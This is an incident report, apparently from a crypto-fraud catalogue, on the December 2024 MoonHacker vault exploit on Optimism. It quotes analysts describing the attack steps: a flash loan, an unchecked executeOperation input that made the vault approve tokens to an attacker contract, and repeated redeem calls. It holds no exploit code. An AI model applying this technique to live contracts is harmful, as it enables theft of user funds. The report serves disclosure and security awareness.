Dec 2024 - Moonhacker Moonwell Vault Unprotected ExecuteOperation Call - $320k (Global)
Moonwell is a decentralized lending platform that enables users to lend or borrow digital assets without monthly payments or additional fees, allowing for flexible repayment schedules. It prioritizes security by conducting thorough audits through Halborn Security and offering a bug bounty program with rewards up to $250,000. The platform operates across multiple networks, including Base, Moonbeam, and Optimism, with a variety of available markets such as USDC, Ethereum, and Staked Ethereum, offering competitive annual percentage yields (APY). Moonwell also emphasizes community governance, empowering members to make decisions and adapt to changing market conditions. The platform currently has a total market size of nearly $791 million, with a significant portion supplied by its users.
The attack targeted the MoonHacker vault contracts interacting with the Moonwell DeFi protocol on the Optimism network, exploiting improper input validation in the executeOperation function. This vulnerability allowed the attacker to pass a malicious contract as the mToken address, gaining unauthorized token approvals and manipulating the contract logic. The attacker deployed two contracts, exploited the vulnerability, and withdrew the stolen funds. To mitigate such risks in the future, the blog recommends implementing proper input validation, access control, and function modifiers. The incident highlights the importance of comprehensive audits and validation checks in smart contract security to protect user funds in the DeFi ecosystem.
"First, the attacker took out a flash loan of USDC on Aave, because they needed more USDC to call repayBorrow and redeem (withdraw) many times to drain the vault."
"Next, they called the vulnerable executeOperation function on the Moonhacker vault, but instead of specifying the mUSDC contract, they specified their own wallet as the approval address.
This allowed them to steal all the mUSDC collateral tokens held by the vault."
"Then they simply called repayBorrow and redeem (withdraw) multiple times to withdraw all of the underlying USDC that was previously held by the Moonhacker vault.
Finally, they repaid the flash loan to Aave and took all the USDC profit they had stolen from Moonhacker."
"Compound fork lending project – Moonwell was hacked because of improper input check.
There’re several Moonhacker contracts that can be used for smart supply and borrow. In “executeOperation” function, input data is not checked, hacker was able to input his own contract as mToken contract as there’s no check.
If he provide his contract as mToken, Moonhacker contract approves his tokens to that contract.
Then, he could move all tokens to his contract. Total loss is about $320k."
"As a precautionary measure, I withdrew my funds in the @MoonwellDeFi Flagship USDC vault curated by Morpho until an official report is out. If you have funds in the pool on Optimium, withdraw them as soon as possible."
Lukeyoungblood offered to help out the affected smart contract. "If the team or individual behind Moonhacker would like to reach out and get help from Moonwell contributors or teams like Seal 911 who can potentially try to help them recover the USDC stolen from their vault, please DM me on Telegram". It is unclear that any effort was undertaken to track or recover the funds.
Further Analysis
Moonwell is a decentralized lending platform that allows users to lend or borrow digital assets with flexible repayment schedules and no additional fees. It prioritizes security through audits by Halborn Security and a bug bounty program with rewards up to $250,000. The platform operates across multiple networks like Base, Moonbeam, and Optimism, offering markets for USDC, Ethereum, and Staked Ethereum with competitive APY. Moonwell emphasizes community governance and has a total market size of nearly $791 million. A recent exploit targeted the MoonHacker vault, interacting with Moonwell, where a vulnerability in the executeOperation function allowed an attacker to manipulate token approvals and steal $320,000 USDC. The creator of the MoonHacker vault does not appear to have responded to the situation.
How Could This Have Been Prevented?
More Cryptocurrency Exchange Hacks/Scams/Frauds
Yat Siu $MOCA Launch Via Twitter/X Account Compromise > > < < Vivek Ramaswamy Usual Money Partnership Twitter/X Post
Sources/Further Reading
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan
(Dec 31)
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan
(Dec 31)
0xNickLFranklin - "There're several Moonhacker contracts that can be used for smart supply and borrow. In "executeOperation" function, input data is not checked, hacker was able to input his own contract" - Twitter (Dec 31)
Moonwell hacked. – Defi hack analysis (Dec 31)
@CyversAlerts Twitter (Dec 31)
@LukeYoungblood Twitter (Dec 31)
MoonHacker | Address 0xd9b45e2c389b6ad55dd3631abc1de6f2d2229847 | OP Mainnet Etherscan
(Dec 31)
OP Mainnet Transaction Hash (Txhash) Details | OP Mainnet Etherscan
(Dec 31)
https://www.binance.com/en/square/post/12-24-2024-moonhacker-contract-suffers-flash-loan-attack-incurring-320-000-loss-17975611563473 (Dec 31)
Moonhacker contract suffered a flash loan attack, resulting in a loss of approximately $320,000 - ChainCatcher (Dec 31)
Moonhacker contract was attacked by flash loan, losing about $320,000 - PANews (Dec 31)
"The stolen funds on MoonHacker only trace to several 'SmartSupply()' call days ago while the Moonwell lending pools are not affected. The "MoonHacker" deployers have no known connection to Moonwell." (Dec 31)
DeFiHackLabs/src/test/2024-12/Moonhacker_exp.sol at main · SunWeb3Sec/DeFiHackLabs · GitHub (Dec 31)
Debaub - "The attacker abused an Unchecked FlashLoan Callback & an Unrestricted Approve Proxy." - Twitter (Dec 31)
Original CertiK Post (Dec 31)
MoonHacker Vault Hack Analysis - Verichains (Dec 31)
MoonHacker Vault Hack Analysis - Shashank (Dec 31)
SJ_cryptosight - "As a precautionary measure, I withdrew my funds in the @MoonwellDeFi Flagship USDC vault curated by Morpho until an official report is out. If you have funds in the pool on Optimium, withdraw them as soon as possible." - Twitter (Dec 31)
Lukeyoungblood - "If the team or individual behind Moonhacker would like to reach out and get help from Moonwell contributors or teams like Seal 911 who can potentially try to help them recover the USDC stolen from their vault, please DM me on Tel...itter (Dec 31)
 t.me/QuadrigaInitiative
|
 /r/QuadrigaInitiative
|
 @QuadrigaInit
|
 info@quadrigainitiative.com
|